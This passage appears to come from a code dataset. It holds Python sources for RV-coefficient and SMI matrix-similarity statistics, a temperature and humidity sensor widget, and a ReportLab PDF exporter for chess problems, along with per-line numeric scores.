array\n", " in\n", "\n", " Examples\n", " --------\n", " >>> import hoggorm as ho\n", " >>> import numpy as np\n", " >>>\n", " >>> # Generate some random data. Note that number of rows must match across arrays\n", " >>> arr1 = np.random.rand(50, 100)\n", " >>> arr2 = np.random.rand(50, 20)\n", " >>> arr3 = np.random.rand(50, 500)\n", " >>>\n", " >>> # Center the data before computation of RV coefficients\n", " >>> arr1_cent = arr1 - np.mean(arr1, axis=0)\n", " >>> arr2_cent = arr2 - np.mean(arr2, axis=0)\n", " >>> arr3_cent = arr3 - np.mean(arr3, axis=0)\n", " >>>\n", " >>> # Compute RV matrix correlation coefficients on mean centered data\n", " >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent])\n", " >>> array([[ 1. , 0.41751839, 0.77769025],\n", " [ 0.41751839, 1. , 0.51194496],\n", " [ 0.77769025, 0.51194496, 1. ]])\n", " >>>\n", " >>> # Get RV for arr1_cent and arr2_cent\n", " >>> rv_results[0, 1]\n", " 0.41751838661314689\n", " >>>\n", " >>> # or\n", " >>> rv_results[1, 0]\n", " 0.41751838661314689\n", " >>>\n", " >>> # Get RV for arr2_cent and arr3_cent\n", " >>> rv_results[1, 2]\n", " 0.51194496245209853\n", " >>>\n", " >>> # or\n", " >>> rv_results[2, 1]\n", " 0.51194496245209853\n", "\n", " \"\"\"\n", "\n", " # First compute the scalar product matrices for each data set X\n", " scalArrList = []\n", "\n", " for arr in dataList:\n", " scalArr = numpy.dot(arr, numpy.transpose(arr))\n", " scalArrList.append(scalArr)\n", "\n", " # Now compute the 'between study cosine matrix' C\n", " C = numpy.zeros((len(dataList), len(dataList)), float)\n", "\n", " for index, element in numpy.ndenumerate(C):\n", " nom = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[1]]))\n", " denom1 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[0]]))\n", " denom2 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[1]]),\n", " scalArrList[index[1]]))\n", " Rv = nom / numpy.sqrt(numpy.dot(denom1, denom2))\n", " C[index[0], index[1]] = Rv\n", "\n", " return C\n", "\n", "\n", "def RV2coeff(dataList):\n", " \"\"\"\n", " This function computes the RV matrix correlation coefficients between pairs\n", " of arrays. The number and order of objects (rows) for the two arrays must\n", " match. The number of variables in each array may vary. The RV2 coefficient\n", " is a modified version of the RV coefficient with values -1 <= RV2 <= 1.\n", " RV2 is independent of object and variable size.\n", "\n", " Reference: `Matrix correlations for high-dimensional data - the modified RV-coefficient`_\n", "\n", " .. _Matrix correlations for high-dimensional data - the modified RV-coefficient: https://academic.oup.com/bioinformatics/article/25/3/401/244239\n", "\n", " PARAMETERS\n", " ----------\n", " dataList : list\n", " A list holding an arbitrary number of numpy arrays for which the RV\n", " coefficient will be computed.\n", "\n", " RETURNS\n", " -------\n", " numpy array\n", " A list holding an arbitrary number of numpy arrays for which the RV\n", " coefficient will be computed.\n", "\n", " Examples\n", " --------\n", " >>> import hoggorm as ho\n", " >>> import numpy as np\n", " >>>\n", " >>> # Generate some random data. Note that number of rows must match across arrays\n", " >>> arr1 = np.random.rand(50, 100)\n", " >>> arr2 = np.random.rand(50, 20)\n", " >>> arr3 = np.random.rand(50, 500)\n", " >>>\n", " >>> # Center the data before computation of RV coefficients\n", " >>> arr1_cent = arr1 - np.mean(arr1, axis=0)\n", " >>> arr2_cent = arr2 - np.mean(arr2, axis=0)\n", " >>> arr3_cent = arr3 - np.mean(arr3, axis=0)\n", " >>>\n", " >>> # Compute RV matrix correlation coefficients on mean centered data\n", " >>> rv_results = ho.RVcoeff([arr1_cent, arr2_cent, arr3_cent])\n", " >>> array([[ 1. , -0.00563174, 0.04028299],\n", " [-0.00563174, 1. , 0.08733739],\n", " [ 0.04028299, 0.08733739, 1. ]])\n", " >>>\n", " >>> # Get RV for arr1_cent and arr2_cent\n", " >>> rv_results[0, 1]\n", " -0.00563174\n", " >>>\n", " >>> # or\n", " >>> rv_results[1, 0]\n", " -0.00563174\n", " >>>\n", " >>> # Get RV for arr2_cent and arr3_cent\n", " >>> rv_results[1, 2]\n", " 0.08733739\n", " >>>\n", " >>> # or\n", " >>> rv_results[2, 1]\n", " 0.08733739\n", " \"\"\"\n", "\n", " # First compute the scalar product matrices for each data set X\n", " scalArrList = []\n", "\n", " for arr in dataList:\n", " scalArr = numpy.dot(arr, numpy.transpose(arr))\n", " diego = numpy.diag(numpy.diag(scalArr))\n", " scalArrMod = scalArr - diego\n", " scalArrList.append(scalArrMod)\n", "\n", " # Now compute the 'between study cosine matrix' C\n", " C = numpy.zeros((len(dataList), len(dataList)), float)\n", "\n", " for index, element in numpy.ndenumerate(C):\n", " nom = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[1]]))\n", " denom1 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[0]]),\n", " scalArrList[index[0]]))\n", " denom2 = numpy.trace(\n", " numpy.dot(numpy.transpose(scalArrList[index[1]]),\n", " scalArrList[index[1]]))\n", " Rv = nom / numpy.sqrt(denom1 * denom2)\n", " C[index[0], index[1]] = Rv\n", "\n", " return C\n", "\n", "\n", "class SMI:\n", " \"\"\"\n", " Similarity of Matrices Index (SMI)\n", "\n", " A similarity index for comparing coupled data matrices.\n", " A two-step process starts with extraction of stable subspaces using\n", " Principal Component Analysis or some other method yielding two orthonormal bases. These bases\n", " are compared using Orthogonal Projection (OP / ordinary least squares) or Procrustes\n", " Rotation (PR). The result is a similarity measure that can be adjusted to various\n", " data sets and contexts and which includes explorative plotting and permutation based testing\n", " of matrix subspace equality.\n", "\n", " Reference: `A similarity index for comparing coupled matrices`_\n", "\n", " .. _A similarity index for comparing coupled matrices: https://onlinelibrary.wiley.com/doi/abs/10.1002/cem.3049\n", "\n", " PARAMETERS\n", " ----------\n", " X1 : numpy array\n", " first matrix to be compared.\n", " X2 : numpy array\n", " second matrix to be compared.\n", " ncomp1 : int, optional\n", " maximum number of subspace components from the first matrix.\n", " ncomp2 : int, optional\n", " maximum number of subspace components from the second matrix.\n", " projection : list, optional\n", " type of projection to apply, defaults to \"Orthogonal\", alternatively \"Procrustes\".\n", " Scores1 : numpy array, optional\n", " user supplied score-matrix to replace singular value decomposition of first matrix.\n", " Scores2 : numpy array, optional\n", " user supplied score-matrix to replace singular value decomposition of second matrix.\n", "\n", " RETURNS\n", " -------\n", " An SMI object containing all combinations of components.\n", "\n", " EXAMPLES\n", " --------\n", " >>> import numpy as np\n", " >>> import hoggorm as ho\n", "\n", " >>> X1 = ho.center(np.random.rand(100, 300))\n", " >>> U, s, V = np.linalg.svd(X1, 0)\n", " >>> X2 = np.dot(np.dot(np.delete(U, 2, 1), np.diag(np.delete(s, 2))), np.delete(V, 2, 0))\n", "\n", " >>> smiOP = ho.SMI(X1, X2, ncomp1=10, ncomp2=10)\n", " >>> smiPR = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, projection=\"Procrustes\")\n", " >>> smiCustom = ho.SMI(X1, X2, ncomp1=10, ncomp2=10, Scores1=U)\n", "\n", " >>> print(smiOP.smi)\n", " >>> print(smiOP.significance())\n", " >>> print(smiPR.significance(B=100))\n", " \"\"\"\n", " def __init__(self, X1, X2, **kargs):\n", " # Check dimensions\n", " assert numpy.shape(X1)[0] == numpy.shape(X2)[0], ValueError(\n", " \"Number of objects must be equal in X1 and X2\")\n", "\n", " # Check number of components against rank\n", " rank1 = st.matrixRank(X1)\n", " rank2 = st.matrixRank(X2)\n", " if \"ncomp1\" not in kargs.keys():\n", " self.ncomp1 = rank1\n", " else:\n", " self.ncomp1 = kargs[\"ncomp1\"]\n", "\n", " if \"ncomp2\" not in kargs.keys():\n", " self.ncomp2 = rank2\n", " else:\n", " self.ncomp2 = kargs[\"ncomp2\"]\n", " assert self.ncomp1 <= rank1, ValueError(\n", " \"Number of components for X1 cannot be higher than the rank of X1\")\n", " assert self.ncomp2 <= rank2, ValueError(\n", " \"Number of components for X2 cannot be higher than the rank of X2\")\n", "\n", " # Handle projection types\n", " if \"projection\" not in kargs.keys():\n", " self.projection = \"Orthogonal\"\n", " else:\n", " self.projection = kargs[\"projection\"]\n", "\n", " assert self.projection in [\n", " \"Orthogonal\", \"Procrustes\"\n", " ], ValueError(\"Unknown projection, should be Orthogonal or Procrustes\")\n", "\n", " # Calculate scores if needed\n", " if \"Scores1\" not in kargs.keys():\n", " Scores1, s, V = numpy.linalg.svd(X1 - numpy.mean(X1, axis=0), 0)\n", " else:\n", " Scores1 = kargs[\"Scores1\"]\n", " if \"Scores2\" not in kargs.keys():\n", " Scores2, s, V = numpy.linalg.svd(X2 - numpy.mean(X2, axis=0), 0)\n", " else:\n", " Scores2 = kargs[\"Scores2\"]\n", "\n", " # Compute SMI values\n", " if self.projection == \"Orthogonal\":\n", " self.smi = numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(Scores1[:, :self.ncomp1]),\n", " Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / (numpy.reshape(\n", " numpy.min(\n", " numpy.vstack([\n", " numpy.tile(range(self.ncomp1), self.ncomp1),\n", " numpy.repeat(range(self.ncomp2), self.ncomp2),\n", " ]),\n", " 0,\n", " ),\n", " [self.ncomp1, self.ncomp2],\n", " ) + 1)\n", " else:\n", " # Procrustes\n", " self.smi = numpy.zeros([self.ncomp1, self.ncomp2])\n", " TU = numpy.dot(\n", " numpy.transpose(Scores1[:, 0:self.ncomp1]),\n", " Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " self.smi[p, q] = numpy.square(numpy.mean(s))\n", "\n", " # Recover wrong calculations (due to numerics)\n", " self.smi[self.smi > 1] = 1\n", " self.smi[self.smi < 0] = 0\n", "\n", " self.N = numpy.shape(Scores1)[0]\n", " self.Scores1 = Scores1\n", " self.Scores2 = Scores2\n", "\n", " def significance(self, **kargs):\n", " \"\"\"\n", " Significance estimation for Similarity of Matrices Index (SMI)\n", "\n", " For each combination of components significance is estimated by sampling from a null distribution\n", " of no similarity, i.e. when the rows of one matrix is permuted B times and corresponding SMI values are\n", " computed. If the vector replicates is included, replicates will be kept together through\n", " permutations.\n", "\n", " PARAMETERS\n", " ----------\n", " B integer : int, optional\n", " number of permutations, default = 10000.\n", " replicates : numpy array\n", " integer vector of replicates (must be balanced).\n", "\n", " RETURNS\n", " -------\n", " An array containing P-values for all combinations of components.\n", " \"\"\"\n", " if \"B\" not in kargs.keys():\n", " B = 10000\n", " else:\n", " B = kargs[\"B\"]\n", " P = numpy.zeros([self.ncomp1, self.ncomp2])\n", "\n", " if self.projection == \"Orthogonal\":\n", " m = (numpy.reshape(\n", " numpy.min(\n", " numpy.vstack([\n", " numpy.tile(range(self.ncomp1), self.ncomp1),\n", " numpy.repeat(range(self.ncomp2), self.ncomp2),\n", " ]),\n", " 0,\n", " ),\n", " [self.ncomp1, self.ncomp2],\n", " ) + 1)\n", " if \"replicates\" not in kargs.keys():\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " while i < B:\n", " numpy.random.shuffle(BScores1)\n", " smiB = (numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(BScores1[:, :self.ncomp1]),\n", " self.Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / m)\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", " else:\n", " # With replicates\n", " AScores1 = self.Scores1.copy()\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " replicates = kargs[\"replicates\"]\n", " uni = numpy.unique(replicates, return_inverse=True)\n", " vecOut = numpy.array(range(numpy.shape(uni[0])[0]))\n", " vecIn = numpy.array(range(sum(uni[1] == 0)))\n", " nOut = len(vecOut)\n", " nIn = len(vecIn)\n", " while i < B:\n", " numpy.random.shuffle(\n", " vecOut) # Permute across replicate sets\n", " for j in range(nOut):\n", " numpy.random.shuffle(\n", " vecIn) # Permute inside replicate sets\n", " BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) +\n", " vecIn, :]\n", " smiB = (numpy.cumsum(\n", " numpy.cumsum(\n", " numpy.square(\n", " numpy.dot(\n", " numpy.transpose(BScores1[:, :self.ncomp1]),\n", " self.Scores2[:, :self.ncomp2],\n", " )),\n", " axis=1,\n", " ),\n", " axis=0,\n", " ) / m)\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", "\n", " else:\n", " if \"replicates\" not in kargs.keys():\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " smiB = numpy.zeros([self.ncomp1, self.ncomp2])\n", " while i < B:\n", " numpy.random.shuffle(BScores1) # Permutation of rows\n", " TU = numpy.dot(\n", " numpy.transpose(BScores1[:, 0:self.ncomp1]),\n", " self.Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " smiB[p, q] = numpy.square(numpy.mean(s))\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", " else:\n", " # With replicates\n", " AScores1 = self.Scores1.copy()\n", " BScores1 = self.Scores1.copy()\n", " i = 0\n", " smiB = numpy.zeros([self.ncomp1, self.ncomp2])\n", " replicates = kargs[\"replicates\"]\n", " uni = numpy.unique(replicates, return_inverse=True)\n", " vecOut = numpy.array(range(numpy.shape(uni[0])[0]))\n", " vecIn = numpy.array(range(sum(uni[1] == 0)))\n", " nOut = len(vecOut)\n", " nIn = len(vecIn)\n", " while i < B:\n", " numpy.random.shuffle(\n", " vecOut) # Permute across replicate sets\n", " for j in range(nOut):\n", " numpy.random.shuffle(\n", " vecIn) # Permute inside replicate sets\n", " BScores1[uni[1] == j, :] = AScores1[vecOut[j] * (nIn) +\n", " vecIn, :]\n", " TU = numpy.dot(\n", " numpy.transpose(BScores1[:, 0:self.ncomp1]),\n", " self.Scores2[:, 0:self.ncomp2],\n", " )\n", " for p in range(self.ncomp1):\n", " for q in range(self.ncomp2):\n", " U, s, V = numpy.linalg.svd(TU[:p + 1, :q + 1])\n", " smiB[p, q] = numpy.square(numpy.mean(s))\n", " # Increase P-value if non-significant permutation\n", " P[self.smi > numpy.maximum(smiB, 1 - smiB)] += 1\n", " i += 1\n", "\n", " return P / B\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0.006711409395973154, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01020408163265306, 0.011235955056179775, 0.011627906976744186, 0.010309278350515464, 0, 0, 0, 0, 0.008620689655172414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01098901098901099, 0, 0.010869565217391304, 0, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009433962264150943, 0.008928571428571428, 0.010309278350515464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
463
0.000406
false
# coding=utf-8 from plugins.utils import get_used_plugins_by, get_latest_sensor_value from climate.models import TempHumidValue def get_widget_data(plan_id): """ Функция, предоставляющая данные температуры и относительной влажности для каждого добавленого датчика DHT. :param plan_id: int ID планировки. :returns: list Список кортежей с данными температуры, влажности и координатами расположения виджета. """ sensors = get_used_plugins_by(package='plugins.arduino_dht') sensors = [sensor for sensor in sensors if sensor.plan_image_id == plan_id] values = [get_latest_sensor_value(TempHumidValue, sensor) for sensor in sensors] return [(plan_id, v.content_object.name, v.content_object.horiz_position, v.content_object.vert_position, v.content_object.level, v.temperature, v.humidity) for v in values if v is not None]
[ "# coding=utf-8\n", "from plugins.utils import get_used_plugins_by, get_latest_sensor_value\n", "from climate.models import TempHumidValue\n", "\n", "\n", "def get_widget_data(plan_id):\n", " \"\"\"\n", " Функция, предоставляющая данные температуры и относительной влажности для каждого\n", " добавленого датчика DHT.\n", "\n", " :param plan_id: int ID планировки.\n", " :returns: list Список кортежей с данными температуры, влажности и координатами расположения\n", " виджета.\n", " \"\"\"\n", "\n", " sensors = get_used_plugins_by(package='plugins.arduino_dht')\n", " sensors = [sensor for sensor in sensors if sensor.plan_image_id == plan_id]\n", "\n", " values = [get_latest_sensor_value(TempHumidValue, sensor) for sensor in sensors]\n", "\n", " return [(plan_id, v.content_object.name, v.content_object.horiz_position,\n", " v.content_object.vert_position, v.content_object.level,\n", " v.temperature, v.humidity) for v in values if v is not None]\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0 ]
23
0.00147
false
# -*- coding: utf-8 -*- # local import model # 3rd party import reportlab.rl_config reportlab.rl_config.warnOnMissingFontGlyphs = 0 from reportlab.pdfbase import pdfmetrics from reportlab.pdfbase.ttfonts import TTFont import reportlab.platypus from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle from reportlab.lib.pagesizes import A4 from PyQt5 import QtGui # local import model FONT_FAMILY = 'Roboto Condensed' FONT_SIZE = { 'header': 12, 'chess': 18, 'subscript': 10, 'footer': 10, 'rightpane': 12} FONT_DIR = 'resources/fonts/roboto/' FONT_INFO = { 'normal': ( FONT_FAMILY + '', 'RobotoCondensed-Regular.ttf'), 'bold': ( FONT_FAMILY + ' Bold', 'RobotoCondensed-Bold.ttf'), 'italic': ( FONT_FAMILY + ' Italic', 'RobotoCondensed-Italic.ttf'), 'boldItalic': ( FONT_FAMILY + ' Bold Italic', 'RobotoCondensed-BoldItalic.ttf')} CHESS_FONTS = { 'd': ('GC2004D', 'resources/fonts/gc2004d_.ttf'), 'x': ('GC2004X', 'resources/fonts/gc2004x_.ttf'), 'y': ('GC2004Y', 'resources/fonts/gc2004y_.ttf') } CHESS_FONT_RENDERING_OFFSET = 0.25 MARGIN_X, MARGIN_Y = 72 - FONT_SIZE['chess'], 72 AUX_X_MARGIN = 36 CHESS_FONT_STYLES = {} def register_fonts(): for variation in list(FONT_INFO.keys()): pdfmetrics.registerFont(TTFont(FONT_INFO[variation][0], FONT_DIR+FONT_INFO[variation][1])) pdfmetrics.registerFontFamily( FONT_FAMILY, normal=FONT_INFO['normal'][0], bold=FONT_INFO['bold'][0], italic=FONT_INFO['italic'][0], boldItalic=FONT_INFO['boldItalic'][0]) for key in list(CHESS_FONTS.keys()): pdfmetrics.registerFont(TTFont(CHESS_FONTS[key][0], CHESS_FONTS[key][1])) pdfmetrics.registerFontFamily(key, normal=key, bold=key, italic=key, boldItalic=key) styles = getSampleStyleSheet() styles.add( ParagraphStyle( name='chess'+key, wordWrap=False, fontName=CHESS_FONTS[key][0], fontSize=FONT_SIZE['chess'], spaceAfter=0)) CHESS_FONT_STYLES[key] = styles['chess'+key] def getPieceParagraph(font, char): return reportlab.platypus.Paragraph( '<para autoLeading="max">%s</para>' % char, CHESS_FONT_STYLES[font] ) class ExportDocument: def __init__(self, records, Lang): ExportDocument.startFonts() self.records, self.Lang = records, Lang register_fonts() styles = getSampleStyleSheet() styles.add(ParagraphStyle(name='Justify', wordWrap=True)) styles.add(ParagraphStyle(name='Center', alignment=reportlab.lib.enums.TA_CENTER)) styles.add( ParagraphStyle( name='Pre', wordWrap=True, fontName=FONT_FAMILY, fontSize=FONT_SIZE['rightpane'], spaceAfter=FONT_SIZE['rightpane'])) self.style = styles['Justify'] self.style_pre = styles['Pre'] self.style_center = styles['Center'] def doExport(self, filename): frameTemplate = reportlab.platypus.Frame( 0, 0, A4[0], A4[1], leftPadding=MARGIN_X, bottomPadding=MARGIN_Y, rightPadding=MARGIN_X, topPadding=MARGIN_Y ) pageTemplate = reportlab.platypus.PageTemplate(frames=[frameTemplate]) docTemplate = reportlab.platypus.BaseDocTemplate( filename, pagesize=A4, pageTemplates=[pageTemplate], showBoundary=1, leftMargin=0, rightMargin=0, topMargin=0, bottomMargin=0, allowSplitting=1, _pageBreakQuick=1) story = [] for i in range(0, len(self.records)): story.append(self.mainTable(self.records[i])) story.append(reportlab.platypus.PageBreak()) docTemplate.build(story) def subscript(self, left, middle, right): fs = FONT_SIZE['chess'] t = reportlab.platypus.Table([['', left, middle, right]], colWidths=[fs*(1+CHESS_FONT_RENDERING_OFFSET), 2 * fs, 4 * fs, 2 * fs], rowHeights=[None] ) t.setStyle(reportlab.platypus.TableStyle([ ('LEFTPADDING', (1, 0), (1, 0), 0), ('RIGHTPADDING', (3, 0), (3, 0), 0), ('TOPPADDING', (0, 0), (-1, 0), FONT_SIZE['subscript']), ('VALIGN', (0, 0), (-1, 0), 'TOP'), ('ALIGN', (1, 0), (1, 0), 'LEFT'), ('ALIGN', (2, 0), (2, 0), 'CENTER'), ('ALIGN', (3, 0), (3, 0), 'RIGHT'), ('FACE', (0, 0), (-1, 0), FONT_FAMILY), ('SIZE', (0, 0), (-1, 0), FONT_SIZE['subscript']) ])) return t def mainTable(self, entry): w_left = 10 * FONT_SIZE['chess'] w_right = A4[0] - 2 * MARGIN_X - w_left - AUX_X_MARGIN t = reportlab.platypus.Table( [[self.leftTop(entry), '', ''], [self.leftBottom(entry), '', self.rightBottom(entry)]], colWidths=[w_left, AUX_X_MARGIN, w_right], rowHeights=[None, None] ) t.setStyle(reportlab.platypus.TableStyle([ ('VALIGN', (0, 0), (-1, 0), 'BOTTOM'), ('VALIGN', (0, 1), (-1, 1), 'TOP') ])) return t def leftTop(self, e): if e is None: return '' header = reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font><br/>' % (FONT_FAMILY, FONT_SIZE['header'], ExportDocument.header(e, self.Lang)), self.style ) return reportlab.platypus.Table( [['', header]], colWidths=[FONT_SIZE['chess'], 9*FONT_SIZE['chess']] ) def leftBottom(self, e): story = [] if e is None: return story b = model.Board() if 'algebraic' in e: b.fromAlgebraic(e['algebraic']) story.append(self.getBoardTable(b)) s_left = '' if 'stipulation' in e: s_left = e['stipulation'] s_middle = reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font>' % (FONT_FAMILY, FONT_SIZE['footer'], ExportDocument.solver( e, self.Lang) + '<br/>' + ExportDocument.legend(b)), self.style_center) story.append(self.subscript(s_left, s_middle, b.getPiecesCount())) return story def fenLine(self, b): t = reportlab.platypus.Table([[b.toFen()]]) t.setStyle(reportlab.platypus.TableStyle([ ('TEXTCOLOR', (0, 0), (-1, -1), (0.75, 0.75, 0.75)), ('LEFTPADDING', (0, 0), (-1, -1), 0), ('TOPPADDING', (0, 0), (-1, -1), FONT_SIZE['rightpane']), ])) return t def rightBottom(self, e): story = [] if e is None: return story parts = [] if 'solution' in e: story.append( reportlab.platypus.Preformatted( wrapParagraph( e['solution'], 50), self.style_pre)) if 'keywords' in e: parts.append('<i>' + ', '.join(e['keywords']) + '</i>') if 'comments' in e: parts.append('<br/>'.join(e['comments'])) story.append(reportlab.platypus.Paragraph( '<font face="%s" size=%d>%s</font>' % ( FONT_FAMILY, FONT_SIZE['rightpane'], '<br/><br/>'.join(parts) ), self.style )) if 'algebraic' in e: b = model.Board() b.fromAlgebraic(e['algebraic']) story.append(self.fenLine(b)) return story def header(e, Lang): parts = [] if'authors' in e: parts.append("<b>" + "<br/>".join(e['authors']) + "</b>") if 'source' in e and 'name' in e['source']: s = "<i>" + e['source']['name'] + "</i>" sourceid = model.formatIssueAndProblemId(e['source']) if sourceid != '': s = s + "<i> (" + sourceid + ")</i>" if 'date' in e['source']: s = s + "<i>, " + model.formatDate(e['source']['date']) + "</i>" parts.append(s) if 'award' in e: tourney = e.get('award', {}).get('tourney', {}).get('name', '') source = e.get('source', {}).get('name', '') if tourney != '' and tourney != source: parts.append(tourney) if 'distinction' in e['award']: d = model.Distinction.fromString(e['award']['distinction']) parts.append(d.toStringInLang(Lang)) return ExportDocument.escapeHtml("<br/>".join(parts)) header = staticmethod(header) def solver(e, Lang): parts = [] if(model.notEmpty(e, 'intended-solutions')): if '.' in e['intended-solutions']: parts.append(e['intended-solutions']) else: parts.append( e['intended-solutions'] + " " + Lang.value('EP_Intended_solutions_shortened')) if('options' in e): parts.append("<b>" + "<br/>".join(e['options']) + "</b>") if('twins' in e): parts.append(model.createPrettyTwinsText(e)) return ExportDocument.escapeHtml("<br/>".join(parts)) solver = staticmethod(solver) def legend(board): legend = board.getLegend() if len(legend) == 0: return '' return ExportDocument.escapeHtml( "<br/>".join([", ".join(legend[k]) + ': ' + k for k in list(legend.keys())])) legend = staticmethod(legend) def escapeHtml(str): str = str.replace('&', '&amp;') # todo: more replacements return str escapeHtml = staticmethod(escapeHtml) fontsStarted = False def startFonts(): if ExportDocument.fontsStarted: return register_fonts() ExportDocument.topBorder = [getPieceParagraph('y', char) for char in "KLLLLLLLLM"] ExportDocument.bottomBorder = [getPieceParagraph('y', char) for char in "RSSSSSSSST"] ExportDocument.leftBorder = getPieceParagraph('y', "N") ExportDocument.rightBorder = getPieceParagraph('y', "Q") ExportDocument.fontsStarted = True startFonts = staticmethod(startFonts) def board2Table(self, board): rows, row = [ExportDocument.topBorder], None for i in range(64): if i % 8 == 0: row = [ExportDocument.leftBorder] rows.append(row) font, char = 'd', ["\xA3", "\xA4"][((i >> 3) + (i % 8)) % 2] if not board.board[i] is None: glyph = board.board[i].toFen() if len(glyph) > 1: glyph = glyph[1:-1] font = model.FairyHelper.fontinfo[glyph]['family'] char = model.FairyHelper.to_html(glyph, i, board.board[i].specs) row.append(getPieceParagraph(font, char)) if i % 8 == 7: row.append(ExportDocument.rightBorder) rows.append(ExportDocument.bottomBorder) return rows def board2Html(self, board): lines = [] spans, fonts, prevfont = [], [], 'z' for i in range(64): font, char = 'd', ["\xA3", "\xA4"][((i >> 3) + (i % 8)) % 2] if not board.board[i] is None: glyph = board.board[i].toFen() if len(glyph) > 1: glyph = glyph[1:-1] font = model.FairyHelper.fontinfo[glyph]['family'] char = model.FairyHelper.fontinfo[glyph][ 'chars'][((i >> 3) + (i % 8)) % 2] if font != prevfont: fonts.append(font) spans.append([char]) prevfont = font else: spans[-1].append(char) if i != 63 and i % 8 == 7: spans[-1].append("<br/>") return ''.join( [ '<font face="%s" size=%d>%s</font>' % (CHESS_FONTS[ fonts[i]][0], FONT_SIZE['chess'], ''.join( spans[i])) for i in range( len(fonts))]) def getBoardTable(self, b): t = reportlab.platypus.Table( self.board2Table(b), colWidths = [FONT_SIZE['chess'] for _ in range(10)], rowHeights = [FONT_SIZE['chess'] for _ in range(10)] ) t.setStyle(reportlab.platypus.TableStyle([ #('INNERGRID', (0,0), (-1,-1), 0.25, colors.black), #('BOX', (0,0), (-1,-1), 0.25, colors.black), ])) return t def wrapParagraph(str, w): lines = [] for line in str.split("\n"): lines.extend(wrapNice(removeInlineIdents(line), w)) return "\n".join(lines) def wrapNice(line, w): if len(line) < w: return [line] words = line.split(' ') cur_line_words = [] total = 0 for i in range(len(words)): if total == 0: new_total = len(words[i]) else: new_total = total + 1 + len(words[i]) if new_total > w: if 